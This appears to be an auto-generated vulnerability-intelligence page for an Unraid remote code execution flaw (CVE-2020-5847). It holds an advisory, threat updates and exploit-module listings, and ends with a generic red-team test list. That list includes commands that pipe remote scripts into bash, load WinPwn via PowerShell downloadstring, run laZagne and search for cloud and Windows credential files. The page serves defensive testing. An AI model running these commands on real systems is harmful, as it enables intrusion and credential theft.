CVE-2020-5847
Overview
This vulnerability is an unauthenticated remote code execution flaw stemming from improper access control in the Unraid server software up to version 6.8.0. The root cause lies in the failure to restrict access to critical API endpoints, allowing external actors to invoke system commands without authentication. The affected component is the Unraid web management interface, which exposes vulnerable HTTP endpoints that process user input insecurely.
Vulnerability Description
Unraid through 6.8.0 allows Remote Code Execution.
Impact
An unauthenticated attacker can execute arbitrary commands on the Unraid server with root privileges, resulting in full system compromise. This includes access to all stored data, potential data exfiltration, and the ability to manipulate or disrupt system operations. No user interaction or credentials are required, making exploitation straightforward from a remote network location. The compromise of the Unraid server can lead to significant business impact including data breaches and operational downtime.
Solution
Upgrade Unraid to a version later than 6.8.0 where this vulnerability is addressed, as detailed in the vendor advisory available at https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/. Follow the vendor's instructions for patching the web management interface. No specific workarounds are documented; applying the official update is required to remediate this issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in Unraid versions up to 6.8.0 is characterized by a critical flaw that allows for remote code execution. This type of vulnerability arises from improper validation of user input, which can lead to an attacker executing arbitrary code on the affected system. The flaw primarily stems from the way the software handles certain requests, allowing malicious actors to craft specially designed inputs that bypass security checks. Once exploited, an attacker can gain unauthorized access to the underlying operating system, potentially leading to full control over the affected server.
Attack vectors for this vulnerability are particularly concerning due to the nature of Unraid as a widely used operating system for network-attached storage and virtualization. An attacker could exploit this flaw through various means, such as sending crafted HTTP requests to the Unraid web interface. If successful, this could allow the attacker to execute commands that manipulate files, install malware, or even pivot to other systems within the network. Scenarios may include a malicious insider attempting to exploit the vulnerability from within the network or an external attacker leveraging phishing techniques to gain access to the system. The ease of exploitation, combined with the potential for significant control over the system, makes this vulnerability particularly dangerous.
The real-world impact of this vulnerability can be severe, especially for businesses relying on Unraid for critical data storage and application hosting. Successful exploitation can lead to data breaches, loss of sensitive information, and potential downtime of services, which can translate into significant financial losses. Furthermore, the ability to execute arbitrary code could enable attackers to deploy ransomware or other malicious software, exacerbating the damage. The reputational harm associated with such incidents can also lead to a loss of customer trust and long-term business implications. Organizations that fail to address this vulnerability risk not only their operational integrity but also their compliance with data protection regulations.
To detect and mitigate the risks associated with this vulnerability, organizations should adopt a multi-faceted approach. Regularly updating Unraid to the latest version is crucial, as software vendors typically release patches to address known vulnerabilities. Implementing network segmentation can also help limit the exposure of critical systems to potential attackers. Intrusion detection systems (IDS) should be configured to monitor for unusual traffic patterns or unauthorized access attempts, providing an additional layer of security. Furthermore, organizations should conduct regular security audits and penetration testing to identify and remediate vulnerabilities before they can be exploited.
In conclusion, the remote code execution vulnerability in Unraid poses a significant threat to organizations utilizing this platform. The potential for exploitation through crafted requests, combined with the severe consequences of a successful attack, necessitates immediate attention from cybersecurity professionals. By implementing robust detection and mitigation strategies, organizations can protect their assets and maintain the integrity of their operations in the face of evolving cyber threats.
CSURFACE threat intelligence has detected a notable surge in activity related to CVE-2020-5847, with telemetry indicating a steady upward trend in exploit attempts targeting Unraid systems. This increase is accompanied by a marginal rise in the Exploit Prediction Scoring System (EPSS) score, reflecting growing confidence in the likelihood of exploitation. The availability of mature Metasploit modules continues to facilitate adversary access, lowering the barrier for attackers to execute arbitrary code remotely. While ransomware use remains unconfirmed, the escalation in exploitation attempts elevates the risk profile for organizations relying on Unraid 6.8.0 or earlier versions. Defenders should recognize this heightened threat environment as indicative of adversaries actively probing for vulnerable targets, underscoring the urgency of maintaining vigilant monitoring and rapid response capabilities. Overall, the evolving exploitation landscape warrants an increased threat level, signaling a shift from theoretical risk to more tangible operational impact.
Update 2 — June 07, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting the Unraid vulnerability CVE-2020-5847. Our telemetry indicates a sustained uptick in adversary activity leveraging the known authentication bypass and PHP code execution vectors, consistent with the availability of mature Metasploit modules. This intensification signals a shift from opportunistic scanning to more persistent and targeted intrusion efforts. Although ransomware deployment linked to this vulnerability remains unconfirmed, the increased exploitation frequency elevates the operational risk for organizations running Unraid 6.8.0 or earlier. Defenders should interpret this trend as evidence of adversaries actively refining their tactics to gain root-level access, thereby increasing the likelihood of severe compromise. Consequently, the threat level associated with CVE-2020-5847 has risen from a theoretical to a more imminent and actionable risk, underscoring the necessity for heightened vigilance within affected environments.
Update 3 — June 17, 2026
CSURFACE threat intelligence has identified a modest but consistent increase in exploitation attempts targeting CVE-2020-5847, accompanied by a corresponding rise in the Exploit Prediction Scoring System (EPSS) metric. This trend reflects growing adversary interest and refinement in leveraging the vulnerability, particularly through publicly available Metasploit modules that simplify unauthorized root-level code execution on Unraid 6.8.0 systems. Although ransomware deployment linked to this vulnerability remains unconfirmed, the incremental uptick in exploit activity signals a shift from opportunistic scanning to more deliberate targeting. For defenders, this evolving landscape underscores an elevated risk profile, as threat actors are increasingly capable of bypassing authentication controls and executing arbitrary code with administrative privileges. Consequently, the threat level associated with CVE-2020-5847 should be regarded as heightened, moving closer to an imminent operational concern that demands increased situational awareness and proactive monitoring within affected environments.
Update 4 — July 06, 2026
CSURFACE threat intelligence has identified a notable surge in exploitation attempts targeting CVE-2020-5847, reflecting a shift toward more aggressive and sustained adversary engagement. Our telemetry indicates that threat actors are increasingly leveraging publicly available Metasploit modules to bypass authentication and execute arbitrary code with root privileges on vulnerable Unraid 6.8.0 systems. This escalation suggests that exploitation is moving beyond opportunistic scanning to targeted intrusions, potentially enabling attackers to establish persistent footholds or deploy secondary payloads. Although ransomware involvement remains unconfirmed, the heightened activity amplifies the risk of compromise in environments running affected versions. Consequently, the threat level associated with this vulnerability has escalated to a critical operational concern, warranting intensified vigilance and real-time monitoring to detect and respond to exploitation attempts promptly.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Unraid | Unraid | All |
cpe:2.3:o:unraid:unraid:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Unraid 6.8.0 Auth Bypass PHP Code Execution
exploits/linux/http/unraid_auth_bypass_exec
|
Nicolas CHATELAIN <[email protected]> | Unknown | php | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit) | Metasploit | remote | linux | - | View |
Threat Feed
32 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-5847 |
| sysdream.com |
GitHub CVE
x_refsource_MISC
|
https://sysdream.com/news/lab/ |
| forums.unraid.net |
GitHub CVE
x_refsource_MISC
|
https://forums.unraid.net/forum/7-announcements/ |
| sysdream.com |
GitHub CVE
x_refsource_MISC
|
https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/ |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/157275/Unraid-6.8.0-Authentication-Bypass-Arbitrary-Code-Execution.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-5847 |